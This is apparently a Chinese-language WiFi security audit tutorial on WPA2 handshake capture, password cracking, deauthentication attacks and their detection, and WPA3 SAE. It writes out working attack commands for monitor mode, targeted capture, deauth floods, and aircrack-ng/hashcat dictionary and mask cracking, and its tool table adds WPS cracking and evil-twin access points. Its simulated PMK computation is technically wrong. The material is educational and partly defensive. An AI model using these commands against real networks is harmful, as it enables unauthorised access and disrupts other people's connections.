WiFi安全审计核心技术:从握手捕获到deauth攻击检测
无线网络是安全防线中最脆弱的环节之一。信号穿越墙壁,攻击者无需物理接触即可发起攻击。理解WPA/WPA2的4次握手过程和deauth攻击机制,是进行无线安全审计的基础。
# ===== 无线网卡检查 =====
# 查看无线网卡
iwconfig 2>/dev/null || iw dev 2>/dev/null
# 查看无线接口详情
ip link show | grep -i wl
ls /sys/class/net/ | grep -i wl
# ===== 安装aircrack-ng套件 =====
apt-get update -qq &>/dev/null
apt-get install -y aircrack-ng 2>/dev/null || true
which airodump-ng &>/dev/null && echo "aircrack-ng已安装" || \
echo "aircrack-ng未安装,使用模拟环境"
# ===== 扫描周围WiFi(需要无线网卡+监听模式)=====
# 注意:Docker环境通常没有无线网卡,以下为标准操作流程
# 1. 关闭网络管理器(避免干扰)
# systemctl stop NetworkManager 2>/dev/null
# 2. 开启监听模式
# airmon-ng check kill
# airmon-ng start wlan0
# 接口变为 wlan0mon
# 3. 扫描周围AP
# airodump-ng wlan0mon
# 输出: BSSID, PWR, CH, ENC, ESSID
# ===== 模拟无线环境 =====
# 在Docker中模拟WiFi扫描数据
cat > /tmp/wifi_scan_simulation.txt <<'EOF'
CH ][ Enc ][ PWR BSSID ESSID
1 ][ WPA2 ][ -42 AA:BB:CC:DD:EE:01 OfficeWiFi
6 ][ WPA2 ][ -55 AA:BB:CC:DD:EE:02 GuestNet
6 ][ WPA2 ][ -61 AA:BB:CC:DD:EE:03 IoT_Network
11 ][ WPA2 ][ -73 AA:BB:CC:DD:EE:04 ConferenceRoom
11 ][ OPN ][ -68 AA:BB:CC:DD:EE:05 FreeWiFi
3 ][ WEP ][ -81 AA:BB:CC:DD:EE:06 LegacyNet
EOF
echo "模拟WiFi扫描结果:"
cat /tmp/wifi_scan_simulation.txt
捕获4次握手是破解WPA2密码的前提。需要让客户端重新连接(或等待新连接),同时监听握手过程。
# ===== 目标AP锁定扫描 =====
# 针对特定AP详细扫描(需要监听模式)
# airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:01 -w /tmp/handshake wlan0mon
# -c 6: 信道6
# --bssid: 目标AP的MAC
# -w: 保存文件前缀
# wlan0mon: 监听接口
# 当有客户端连接/重连时,会捕获到握手包
# 显示: WPA handshake: AA:BB:CC:DD:EE:01
# ===== 模拟握手包分析 =====
# 创建模拟握手包的十六进制数据
cat > /tmp/analyze_handshake.sh <<'SCRIPT'
#!/bin/bash
echo "========================================"
echo " WPA2握手包分析(模拟)"
echo "========================================"
echo -e "\n[1] 握手包结构"
echo " Msg 1: AP → STA (ANonce)"
echo " - Frame Type: Authentication"
echo " - Key Info: Pairwise = 1, Install = 0"
echo " - ANonce: 随机数 (32字节)"
echo ""
echo " Msg 2: STA → AP (SNonce + MIC)"
echo " - Key Info: Pairwise = 1, MIC = 1"
echo " - SNonce: 随机数 (32字节)"
echo " - MIC: 消息完整性校验 (16字节)"
echo ""
echo " Msg 3: AP → STA (MIC + GTK)"
echo " - Key Info: Pairwise = 1, Install = 1, MIC = 1"
echo " - Encrypted GTK"
echo ""
echo " Msg 4: STA → AP (ACK)"
echo " - Key Info: Pairwise = 1, MIC = 1"
echo -e "\n[2] 密钥派生过程"
echo " PMK = PBKDF2-SHA1(password, SSID, 4096, 256)"
echo " PTK = PRF-512(PMK, 'Pairwise key expansion',"
echo " ANonce || SNonce || AP_MAC || STA_MAC)"
echo ""
echo " PTK结构 (512 bits = 64 bytes):"
echo " KCK (16B) - 用于计算MIC"
echo " KEK (16B) - 用于加密GTK"
echo " TK (16B) - 用于数据加密( CCMP)"
echo " TMK (8B) - 用于MIC(可选)"
echo -e "\n[3] 破解所需信息"
echo " ✅ SSID (网络名称)"
echo " ✅ ANonce (来自Msg 1)"
echo " ✅ SNonce (来自Msg 2)"
echo " ✅ AP MAC 地址"
echo " ✅ STA MAC 地址"
echo " ✅ MIC (来自Msg 2)"
echo " ✅ 802.1x数据帧"
echo ""
echo " 攻击者只需: SSID + 4次握手数据 + 字典"
echo "========================================"
SCRIPT
chmod +x /tmp/analyze_handshake.sh
bash /tmp/analyze_handshake.sh
# ===== 使用aircrack-ng字典破解 =====
# 基本用法
# aircrack-ng -w /usr/share/wordlists/rockyou.txt /tmp/handshake-01.cap
# 指定ESSID
# aircrack-ng -e OfficeWiFi -w wordlist.txt /tmp/handshake-01.cap
# ===== 使用hashcat破解(GPU加速)=====
# 1. 将cap转换为hc22000格式
# 使用hcxtools转换
# hcxpcapngtool -o hash.hc22000 /tmp/handshake-01.cap
# 2. hashcat破解
# hashcat -m 22000 hash.hc22000 wordlist.txt
# hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d # 8位纯数字
# ===== 模拟密码破解流程 =====
cat > /tmp/wpa_crack_sim.sh <<'SCRIPT'
#!/bin/bash
echo "========================================"
echo " WPA2密码破解模拟"
echo "========================================"
# 模拟SSID和密码
SSID="TestNetwork"
CORRECT_PASS="P@ssw0rd123"
# 模拟PBKDF2密钥派生
echo -e "\n[1] PMK生成过程"
echo " SSID: $SSID"
echo " 密码: ********"
echo " 迭代次数: 4096"
echo " 算法: HMAC-SHA1"
echo ""
echo " PMK = PBKDF2(密码, SSID, 4096, 32)"
# 模拟字典攻击
echo -e "\n[2] 字典攻击模拟"
wordlist=("12345678" "password" "qwerty123" "P@ssw0rd123" "admin123")
for word in "${wordlist[@]}"; do
if [ "$word" = "$CORRECT_PASS" ]; then
echo " ✅ 密码找到: $word"
break
else
echo " ❌ 尝试: $word"
fi
done
# 计算真实PMK(使用openssl)
echo -e "\n[3] 实际PMK计算验证"
# 使用openssl生成PMK
PMK=$(echo -n "P@ssw0rd123" | openssl dgst -sha1 -hmac "TestNetwork" -binary 2>/dev/null | xxd -p | head -c 64)
echo " PMK (前32字节): ${PMK:0:64}"
# 破解时间估算
echo -e "\n[4] 破解时间估算"
echo " CPU (i7): ~500 PMK/s"
echo " GPU (RTX 3090): ~1,000,000 PMK/s"
echo " 8位纯数字: 10^8 = 1亿组合"
echo " CPU: ~55小时 | GPU: ~100秒"
echo " 8位字母数字: 62^8 ≈ 2.2万亿组合"
echo " CPU: ~139年 | GPU: ~25天"
echo -e "\n========================================"
SCRIPT
chmod +x /tmp/wpa_crack_sim.sh
bash /tmp/wpa_crack_sim.sh
Deauthentication(反认证)攻击是WiFi攻击中最常见的手段——强制客户端断开连接,迫使其重新握手。
# ===== Deauth帧结构 =====
# 802.11 Deauth帧是管理帧,未经加密
# 攻击者可以伪造AP的MAC地址发送Deauth帧
cat > /tmp/deauth_analysis.sh <<'SCRIPT'
#!/bin/bash
echo "========================================"
echo " Deauth攻击原理与检测"
echo "========================================"
echo -e "\n[1] Deauth帧结构"
echo " ┌──────────────────────────────────────┐"
echo " │ Frame Control: 0x00C0 (Deauth) │"
echo " │ Duration: 0x0000 │"
echo " │ Destination: FF:FF:FF:FF:FF:FF (广播) │"
echo " │ Source: AA:BB:CC:DD:EE:01 (伪造AP) │"
echo " │ BSSID: AA:BB:CC:DD:EE:01 (伪造AP) │"
echo " │ Reason Code: 0x0007 (未关联) │"
echo " └──────────────────────────────────────┘"
echo -e "\n[2] 攻击流程"
echo " Step 1: 识别目标AP (BSSID + Channel)"
echo " Step 2: 识别已连接的客户端"
echo " Step 3: 伪造AP发送Deauth帧"
echo " Step 4: 客户端断开,尝试重连"
echo " Step 5: 捕获4次握手包"
echo -e "\n[3] aireplay-ng deauth命令"
echo " # 向所有客户端发送5个deauth帧"
echo " aireplay-ng -0 5 -a AA:BB:CC:DD:EE:01 wlan0mon"
echo ""
echo " # 向特定客户端发送"
echo " aireplay-ng -0 5 -a AA:BB:CC:DD:EE:01 -c 11:22:33:44:55:66 wlan0mon"
echo -e "\n[4] 为什么Deauth有效?"
echo " ✅ 802.11管理帧不加密(WPA2只加密数据帧)"
echo " ✅ 客户端无法验证Deauth帧来源"
echo " ✅ 标准规定客户端必须接受Deauth帧"
echo " ✅ 发送成本低(一个数据包即可)"
echo -e "\n========================================"
SCRIPT
chmod +x /tmp/deauth_analysis.sh
bash /tmp/deauth_analysis.sh
# ===== Deauth检测脚本 =====
cat > /tmp/deauth_detector.sh <<'SCRIPT'
#!/bin/bash
echo "========================================"
echo " WiFi Deauth攻击检测系统"
echo "========================================"
# 检测原理: 统计短时间内Deauth帧数量
# 正常网络: 极少Deauth帧
# 攻击中: 短时间大量Deauth帧
DEAUTH_THRESHOLD=5 # 5秒内超过5个Deauth帧视为攻击
DEAUTH_WINDOW=5 # 检测窗口(秒)
echo -e "\n[1] 检测规则"
echo " - 窗口时间: ${DEAUTH_WINDOW}秒"
echo " - 阈值: ${DEAUTH_THRESHOLD}个Deauth帧"
echo " - 告警条件: 窗口内Deauth帧数 > 阈值"
echo -e "\n[2] 检测指标"
echo " 指标1: Deauth帧速率 (帧/秒)"
echo " 指标2: Deauth源MAC地址分布"
echo " 指标3: 同一BSSID的Deauth频率"
echo " 指标4: Deauth原因代码分布"
echo -e "\n[3] 告警级别"
echo " 🟢 正常: 0-2 Deauth/5min (偶发)"
echo " 🟡 关注: 3-10 Deauth/5min (可疑)"
echo " 🔴 告警: >10 Deauth/5min (攻击)"
echo -e "\n[4] 防御措施"
echo " ✅ 802.11w (PMF - Protected Management Frames)"
echo " → 管理帧加密,防止伪造Deauth"
echo " ✅ WPA3 强制PMF"
echo " ✅ 无线IDS监控"
echo " ✅ AP端Deauth帧频率限制"
echo " ✅ 客户端忽略广播Deauth"
echo -e "\n[5] PMF (802.11w) 效果"
echo " 未启用PMF: Deauth攻击 ✅ 有效"
echo " 可选PMF: 部分客户端受保护"
echo " 强制PMF: Deauth攻击 ❌ 无效"
echo -e "\n========================================"
SCRIPT
chmod +x /tmp/deauth_detector.sh
bash /tmp/deauth_detector.sh
| 特性 | WPA2 | WPA3-Personal | WPA3-Enterprise |
|---|---|---|---|
| 认证方式 | PSK(预共享密钥) | SAE(同步认证等价) | 192位加密套件 |
| 离线字典攻击 | ❌ 脆弱 | ✅ 免疫 | ✅ 免疫 |
| 管理帧保护 | 可选 | 强制PMF | 强制PMF |
| 前向保密 | ❌ 无 | ✅ 有 | ✅ 有 |
| 弱密码保护 | ❌ 无 | ✅ SAE抗字典 | N/A |
| 加密套件 | CCMP(AES) | CCMP(AES) | GCMP-256 |
# ===== WPA3 SAE握手(替代PSK 4次握手)=====
cat > /tmp/wpa3_sae.sh <<'SCRIPT'
#!/bin/bash
echo "========================================"
echo " WPA3 SAE认证过程"
echo "========================================"
echo -e "\n[1] SAE (Simultaneous Authentication of Equals)"
echo " 与WPA2的关键区别:"
echo " - 无AP/STA角色区分(对等认证)"
echo " - 使用Diffie-Hellman密钥交换"
echo " - 抗离线字典攻击"
echo " - 提供前向保密"
echo -e "\n[2] SAE握手过程"
echo " Step 1: Commit Exchange"
echo " STA → AP: scalar1, element1"
echo " AP → STA: scalar2, element2"
echo ""
echo " Step 2: Confirm Exchange"
echo " STA → AP: confirm1 (验证计算结果)"
echo " AP → STA: confirm2 (验证计算结果)"
echo ""
echo " → 双方独立计算出PMK"
echo " → 攻击者无法通过抓包离线破解"
echo -e "\n[3] 为什么SAE抗字典攻击?"
echo " PSK: 攻击者抓取握手包后可离线尝试"
echo " SAE: 每次认证都需要与AP实时交互"
echo " → 在线尝试 → 可被检测和阻止"
echo " → 离线计算不可行"
echo -e "\n[4] WPA3已知攻击"
echo " 🔴 Dragonblood攻击 (2019)"
echo " - 降级攻击: 强制WPA3→WPA2"
echo " - 组攻击: SAE组不安全"
echo " - 时序攻击: 泄露密码信息"
echo " → 已通过固件更新修补"
echo -e "\n========================================"
SCRIPT
chmod +x /tmp/wpa3_sae.sh
bash /tmp/wpa3_sae.sh
| 工具 | 用途 | 关键命令 |
|---|---|---|
| airodump-ng | AP/客户端扫描 | airodump-ng wlan0mon |
| aireplay-ng | Deauth/注入 | aireplay-ng -0 5 -a BSSID wlan0mon |
| aircrack-ng | WPA密码破解 | aircrack-ng -w dict.txt capfile |
| hashcat | GPU加速破解 | hashcat -m 22000 hash.hc22000 dict |
| hcxtools | 握手包转换 | hcxpcapngtool -o out.cap |
| reaver | WPS破解 | reaver -i wlan0mon -b BSSID |
| bully | WPS破解 | bully wlan0mon -b BSSID |
| hostapd-wpe | 邪恶双子AP | hostapd-wpe hostapd.conf |